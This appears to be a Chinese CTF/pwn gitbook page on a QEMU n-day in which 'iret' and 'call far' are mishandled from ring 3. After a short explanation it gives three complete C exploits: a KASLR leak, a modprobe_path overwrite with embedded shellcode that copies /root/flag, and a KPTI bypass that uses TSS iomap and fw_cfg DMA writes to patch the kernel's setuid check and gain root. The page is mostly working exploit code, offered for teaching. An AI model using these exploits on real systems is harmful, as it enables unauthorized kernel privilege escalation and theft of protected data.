> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/qemu-nday.md).

# QEMU-nday

> 在 9.1 版本前的 QEMU 的所有版本，`iret` 和 `call far` 指令都存在缺陷。

## 漏洞原理

`iretq` 用于从中断返回时，弹出栈的 `rip`、`cs`、`eflags`、`rsp`、`ss`

`call far` 用于改变指令指针、修改 `cs` 的值，并将保存的 `rip` 和 `cs` 压入栈中

`QEMU` 的开发者假设这些指令肯定是从 `ring 0` 返回，如果当前在 `ring 3`，并返回 `ring 3`，只是设置新 `cs`、`ss` 值时，QEMU 自动访问栈，**仿佛当前特权级是 0**

将 `rsp` 更改为任意可写内核页面地址，进行 `lcall`，我们可以在任意地址写入调用指令的地址，由于我们至少可以控制 `lcall` 指令地址的最后一个字节的值，因此每次可以写入一个任意字节。

## 利用流程

用户态发生故障时 `rip` 控制权交给内核，此时内核仍在用户页表，需要一个**共享栈**执行上下文切换

通过触发整数除零错误在共享栈上构建一个有效的 `iret` 帧结构（`r15`\~`r12` 设置为 `cs`/`rflags`/`rsp`/`ss`），然后 `sgdt` 读取共享栈地址，使 `rsp` 指向该地址，再次触发 `iret` 使 `rip` 跳转 `rsp` 触发缺页异常

当 CPU 执行整数除零操作时触发异常，如果使用 `sigaction` 注册了 `SIGFPE` 则不会中断（浮点除零默认不中断，仅在 `MXCSR` 寄存器第二位置零时触发中断）。

### 泄露代码

```c
#include  "helpers.h"
#include  <sys/syscall.h>
#include  <signal.h>
#include  <setjmp.h>

uint64_t kbase;
static sigjmp_buf env;

void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    ucontext_t *uc = (ucontext_t *)context;
    uc->uc_mcontext.gregs[REG_RIP] += 3;
}

void sigsegv_handler(int sig, siginfo_t *si, void *context) {
    ucontext_t *uc = (ucontext_t *)context;
    kbase = (uint64_t) uc->uc_mcontext.gregs[REG_RIP];
    siglongjmp(env, 1);
}

void kaslr() {
    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15, 0x33\n"
        "mov r14, 0x206\n"
        "mov r13, 0x133a000\n"
        "mov r12, 0x2b\n"
        "mov rax, 0\n"
        "div rax\n"
        "push rax\n"
        "sgdt [rsp]\n"
        "mov rax, qword [rsp+2-8]\n"
        "add rax, 0x1f50\n"
        "mov rsp, rax\n"
        "iretq\n"
        ".att_syntax noprefix\n"
    );
}

int main() {
    struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    struct sigaction sa_segv = {0};
    sa_segv.sa_sigaction = sigsegv_handler;
    sa_segv.sa_flags = SA_SIGINFO;
    sigemptyset(&sa_segv.sa_mask);
    sigaction(SIGSEGV, &sa_segv, NULL);

    mmap((void *)0x1338000, PAGE_SIZE*2,
         PROT_READ | PROT_WRITE,
         MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_POPULATE,
         -1, 0);

    if (sigsetjmp(env, 1) == 0) {
        kaslr();
    }

    printf("[!] kbase: 0x%lx\n", kbase);
    return 0;
}
```

### 汇编分析

```c
void kaslr() {
    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15, 0x33\n"
        "mov r14, 0x206\n"
        "mov r13, 0x133a000\n"
        "mov r12, 0x2b\n"
        "mov rax, 0\n"
        "div rax\n"
        "push rax\n"
        "sgdt [rsp]\n"
        "mov rax, qword [rsp+2-8]\n"
        "add rax, 0x1f50\n"
        "mov rsp, rax\n"
        "iretq\n"
        ".att_syntax noprefix\n"
    );
}
```

我们把一些关键信息（要伪造的栈结构）放入 `r12`\~`r15` 寄存器，只有这四个寄存器才会推入共享栈中，触发整数除零中断后，转到内核态执行中断处理（`asm_exc_divide_error`）

![image-20260529195146492](/files/l6sw2R57vB0RuprhCvja)

可以看见我们在一个栈页底部实现了：

```assembly
push r12
push rsp
push r11
push r15
push rip
```

处理完函数后返回用户态，使用 `sgdt` 指令得到 `cpu_entry` 的基址，然后计算得到内核入口栈地址

![image-20260529201203072](/files/kJ47a6gpEndvfj6mrSRi)

到了 `iret`：

![image-20260529201528068](/files/HptE9YYfY2vxugbbenzP)

可以看见，`iret` 后面正是我们伪造的结构，这是某个处理整数除零异常时留下的。

> `call error_entry` 时将 `rip` 放在共享栈上
>
> 然后进入立刻
>
> ```
>  ► 0xffffffff94c01b20 <error_entry>       push   rsi
>    0xffffffff94c01b21 <error_entry+1>     mov    rsi, qword ptr [rsp + 8]
> ```
>
> 将用于返回内核地址存入了 `rsi` 然后保存寄存器时放在栈上

```assembly
push r15
push r14
push r13
push r12
```

再加上 QEMU 中 `iret` 的漏洞，即使在 ring 3 也可以执行 `iret` 指令。

![image-20260529201906138](/files/qJtcPc2FfSA6RNxmX9Pi)

立刻触发缺页异常：

![image-20260529202030341](/files/IMxyV3C5GUUvn6ZF8aHe)

处理完了后，在我们的栈上会留下结构体，这个结构体里面保存着内核地址 `asm_sysvec_apic_timer_interrupt+15`：

![image-20260529204155228](/files/SBdmUXyuom6fL81Q63fl)

然后 `sigsetjmp` 返回到原栈上

### nokpti

```c
#define DBG
#include  <stdio.h>
#include  <stdlib.h>
#include  <stdint.h>
#include  <string.h>
#include  <unistd.h>
#include  <sys/ucontext.h>
#include  <sys/mman.h>
#include  <sys/syscall.h>
#include  <sys/types.h>
#include  <fcntl.h>
#include <sys/stat.h>
#include  <signal.h>
#include  <setjmp.h>

#define PAGE_SIZE 0x1000
#ifndef REG_RIP
#define REG_RIP 16
#endif

#define ASM_EXC_DIVIDE_ERROR_OFFSET    (0x1200930+11)
#define MODPROBE_PATH 					0x23dd420

uint64_t kbase;
static sigjmp_buf env;
uint8_t modprobe_path_shellcode[] = {235, 10, 73, 112, 51, 1, 0, 0, 0, 0, 51, 0, 80, 83, 81, 82, 72, 184, 72, 184, 2, 112, 51, 1, 0, 0, 72, 187, 0, 0, 72, 255, 24, 0, 0, 0, 185, 0, 114, 51, 1, 64, 0, 241, 128, 233, 13, 72, 137, 1, 72, 131, 193, 8, 72, 137, 25, 72, 131, 233, 8, 72, 137, 226, 72, 137, 252, 72, 131, 196, 16, 255, 225, 72, 137, 212, 90, 89, 91, 88, 195};


void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    ucontext_t *uc = (ucontext_t *)context;

    uc->uc_mcontext.gregs[REG_RIP] += 3;
}

void sigsegv_handler(int sig, siginfo_t *si, void *context) {
    ucontext_t *uc = (ucontext_t *)context;

    kbase = (uint64_t) uc->uc_mcontext.gregs[REG_RIP] - ASM_EXC_DIVIDE_ERROR_OFFSET;

    siglongjmp(env, 1);
}

void kaslr() {
	asm volatile(
		".intel_syntax noprefix\n"
		"mov r15, 0x33\n"
		"mov r14, 0x206\n"
		"mov r13, 0x133a000\n"
		"mov r12, 0x2b\n"

		"mov rax, 0\n"
		"div rax\n"

		"push rax\n"
		"sgdt [rsp]\n"
		"mov rax, qword [rsp+2-8]\n"
		"add rax, 0x1f50\n"
		"mov rsp, rax\n"
    
    	"iretq\n"
		".att_syntax noprefix\n"
	);
}

void modprobe_old(const char *script_path, const char *trigger_path, const char *flag_path) {

    FILE *f = fopen(script_path, "w");
    if (f) {
        fprintf(f, "#!/bin/sh\ncp %s /tmp/flag\nchmod 777 /tmp/flag\n", flag_path);
        fclose(f);
        chmod(script_path, 0755);
    }

    f = fopen(trigger_path, "wb");
    if (f) {
        fwrite("\xff\xff\xff\xff", 1, 4, f);
        fclose(f);
        chmod(trigger_path, 0755);
    }

    execve(trigger_path, (char *[]){(char *)trigger_path, NULL}, NULL);
    puts("[!] execve modprobe");
}

int main() {
	struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    struct sigaction sa_segv = {0};
    sa_segv.sa_sigaction = sigsegv_handler;
    sa_segv.sa_flags = SA_SIGINFO;
    sigemptyset(&sa_segv.sa_mask);
    sigaction(SIGSEGV, &sa_segv, NULL);

    mmap((void *)0x1338000, PAGE_SIZE*2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_POPULATE, -1, 0);

    if (sigsetjmp(env, 1) == 0) {
        kaslr();
    }
    
    printf("[!] kbase: 0x%lx\n", kbase);


	void* code_mapping = mmap((void *)0x1337000, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0);

    memcpy((uint8_t *)code_mapping, modprobe_path_shellcode, sizeof(modprobe_path_shellcode));

    unsigned long gadget = 0x0000612f706d742f;
    for(int i = 0; i < 7; ++i)
        ((void(*)(unsigned long, unsigned char))code_mapping)(kbase + MODPROBE_PATH + i, (gadget >> (i*8)) & 0xff);

	modprobe_old("/tmp/a", "/tmp/b", "/root/flag");
	

    puts("[+] finished");
    system("cat /tmp/flag");
    return 0;
}
```

### kpti

[CVE-2022-42703](/pwn-gitbook/kpwn/kpwn-tricks/cve-2022-42703.md)

#### 双核环境

使用上面的思路可以解决，不过需要2个核，利用一个核心上的任意写入漏洞，在另一个核心的异常栈上写入恶意载荷

#### 单核环境（通用）

当然也有单核环境也可完成的方法

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/io.h>
#include <sys/mman.h>
#include <asm/user_64.h>
#include <stddef.h>
#include <setjmp.h>
#include <arpa/inet.h>

#define PAGE_SIZE 0x1000

#define WATCH_ADDR 0xdead000


uint64_t g_errno;
jmp_buf env;
static char stack[0x4000];


#define TSS_PHYS 0xf405000
uint8_t arb_w_shellcode[] = {235, 10, 73, 112, 51, 1, 0, 0, 0, 0, 51, 0, 80, 83, 81, 82, 72, 184, 72, 184, 2, 112, 51, 1, 0, 0, 72, 187, 0, 0, 72, 255, 24, 0, 0, 0, 185, 0, 114, 51, 1, 64, 0, 241, 128, 233, 13, 72, 137, 1, 72, 131, 193, 8, 72, 137, 25, 72, 131, 233, 8, 72, 137, 226, 72, 137, 252, 72, 131, 196, 16, 255, 225, 72, 137, 212, 90, 89, 91, 88, 195};


#define CONFIG_PHYSICAL_START   0ul
#define CONFIG_PHYSICAL_ALIGN   0x200000ul

#define KPTR_RESTRICT           "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET    0x22b5db0ul

#define SETUID_CHECK            0x2e3ca2ul

#define BIOS_CFG_DMA_ADDR_HIGH  0x514
#define BIOS_CFG_DMA_ADDR_LOW   0x518

#define FW_CFG_SIGNATURE	    0x00
#define SIGNATURE               "QEMU"

#define SP0_PTREGS_PHYS_ADDR    0xf40bf58ul

typedef enum fw_cfg_ctl_t {
    fw_ctl_error = 1,
    fw_ctl_read = 2,
    fw_ctl_skip = 4,
    fw_ctl_select = 8,
    fw_ctl_write = 16
} fw_cfg_ctl_t;


// TRIGGER DEBUG
static void set_hw_watch(pid_t pid, uint64_t addr) {
    uint64_t dr0_off = offsetof(struct user, u_debugreg[0]);
    uint64_t dr7_off = offsetof(struct user, u_debugreg[7]);
    uint64_t dr6_off = offsetof(struct user, u_debugreg[6]);

    ptrace(PTRACE_POKEUSER, pid, dr0_off, addr);
	ptrace(PTRACE_POKEUSER, pid, dr7_off, 0xf0101);
	ptrace(PTRACE_POKEUSER, pid, dr6_off, 0);
}

void tracee() {
    ptrace(PTRACE_TRACEME, 0, 0, 0);
    raise(SIGSTOP);

    mmap((void *) WATCH_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0);

    sleep(1);

	int pipes[2];
	pipe(pipes);
	write(pipes[1], (void*) WATCH_ADDR, 1);
	
    _exit(0);
}

void trigger_debug() {
	pid_t pid = fork();
    if (pid == 0)
        tracee();

    int st;
    waitpid(pid, &st, 0);

    set_hw_watch(pid, WATCH_ADDR);
    ptrace(PTRACE_CONT, pid, 0, 0);

    while (1) {
        waitpid(pid, &st, 0);

        if (WIFEXITED(st))
            break;

        if (WIFSTOPPED(st)) {
			int sig = WSTOPSIG(st); 
            if (sig == SIGTRAP)
                ptrace(PTRACE_CONT, pid, 0, 0);
            else
                ptrace(PTRACE_CONT, pid, 0, sig);
        }
    }
}

// ARB READ
void sigsegv_handler(int sig, siginfo_t *info, void *ctx) {
	ucontext_t *u = (ucontext_t *)ctx;
	g_errno = u->uc_mcontext.gregs[REG_ERR];
	u->uc_mcontext.gregs[REG_RSP] = (uint64_t)(stack + 0x1000);

	longjmp(env, 1);
}

struct sigaction orig_sa;
void siginit() {
	stack_t ss = {
		.ss_size = 0x4000,
		.ss_sp = stack,
	};
	struct sigaction sa = {.sa_sigaction = sigsegv_handler,
							.sa_flags = SA_ONSTACK | SA_SIGINFO};
	sigaltstack(&ss, 0);
	sigfillset(&sa.sa_mask);
	sigaction(SIGSEGV, &sa, &orig_sa);
}

void arb_r(uint64_t addr) {
	asm volatile(
		".intel_syntax noprefix\n"
		"mov rsp, %0\n"
		"sub rsp, 9\n"
		"iretq\n"
		".att_syntax prefix\n"
		:
		: "r" (addr)
		: 
	);
}

uint64_t physmap_leak() {
	char gdt[10];
	asm volatile (
        ".intel_syntax noprefix\n"
        "sgdt [%0]\n"
        ".att_syntax prefix\n"
        :
        : "r" (&gdt)
        :
    );

    uint64_t gdt_addr = *(uint64_t*) &gdt[2];
    uint64_t ist3 = gdt_addr + 0xffc8;
	uint64_t physmap = 0xffff000000000000;

	int pipes[2];
	for (int i=0; i<3; i++) {
		pipe(pipes);

		if (!fork()) { 
			siginit();
			if (setjmp(env) == 0) {
				arb_r(ist3+3+i);
			}

			write(pipes[1], &g_errno, sizeof(g_errno));
			_exit(0);
		}

		read(pipes[0], &g_errno, sizeof(g_errno));
		g_errno >>= 8;
		g_errno &= 0xff;
		physmap += (g_errno << ((3+i)*8));
	}

	physmap &= 0xfffffffff0000000;
	return physmap;
}

// IOPL
void arb_w(uint64_t addr) {
	void* code_mapping = mmap((void*) 0x1337000, PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);

    memcpy((uint8_t *)code_mapping, arb_w_shellcode, sizeof(arb_w_shellcode));

    uint64_t gadget = 0x3000;
    for(int i = 0; i<2; ++i)
        ((void(*)(unsigned long, unsigned char))code_mapping)(addr+i, (gadget >> (i*8)) & 0xff);
}

void sigfpe_handler(int sig, siginfo_t *si, void *context) {
    ucontext_t *uc = (ucontext_t *)context;

    uc->uc_mcontext.gregs[REG_RIP] += 3;
}

uint64_t sp0_get_cmd(uint32_t control, uint64_t address, uint32_t length) {
    control = htonl(control);
    address = htobe64(address);
    length = htonl(length);

    asm volatile(
        ".intel_syntax noprefix\n"
        "mov r15d, %1\n"
        "shl r15, 32\n"
        "mov r14d, %0\n"
        "or r15, r14\n"
        "mov r14, %2\n"
        "mov rax, 0\n"
        "div rax\n"
        ".att_syntax prefix\n"
        :
        : "r" (control), "r" (length), "r" (address)
        : "rax", "r14", "r15"
    );

    return SP0_PTREGS_PHYS_ADDR;
}

int phys_arb_w(uint64_t phys_addr, char* value, int size){
    uint64_t cmd_physaddr;
    uint32_t cmd_physaddr_lo;
    uint32_t cmd_physaddr_hi;

    uint64_t byte_addr;
    uint32_t byte_off;

    byte_addr = (uint64_t)memmem(SIGNATURE, sizeof(SIGNATURE), value, size);
    
    if(byte_addr == 0)
        return 0;
    
    byte_off = byte_addr - (uint64_t)SIGNATURE;

    cmd_physaddr = sp0_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_SIGNATURE << 16), 0, byte_off);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    if (cmd_physaddr_hi)
        outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
    
    cmd_physaddr = sp0_get_cmd(fw_ctl_read | (FW_CFG_SIGNATURE << 16), phys_addr, size);
    
    cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
    cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);

    if (cmd_physaddr_hi)
        outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
    outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);

    return 0;
}

uint32_t check_kptr_restrict(){
    uint32_t r;
    FILE* f;
    f = fopen(KPTR_RESTRICT, "rb");
    fscanf(f, "%d", &r);
    fclose(f);
    return r;
}

void fw_cfg() {
	struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    uint64_t phys_kbase;
    for (phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x100; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
        phys_arb_w(phys_kbase + KPTR_RESTRICT_OFFSET, SIGNATURE, sizeof(SIGNATURE));
        if(check_kptr_restrict() != 0)
            break;
    }
    printf("phys kbase @ %lx\n", phys_kbase);

    phys_arb_w(phys_kbase + SETUID_CHECK+0, "E", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+1, "M", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+2, "E", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+3, "M", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+4, "E", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+5, "M", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+6, "E", 1);

	setuid(0);
    
	char flag[0x100];
	int fd = open("/dev/vdb", O_RDONLY);
	read(fd, flag, sizeof(flag));
	puts(flag);

	while(1) {};
}

// EXPLOIT
int main() {
    trigger_debug();
	uint64_t physmap = physmap_leak();
	printf("physmap @ %lx\n", physmap);

	uint64_t tss = physmap + TSS_PHYS;
	uint64_t iomap_base = tss + 0x66;

	arb_w(iomap_base);
	fw_cfg();

    return 0;
}
```
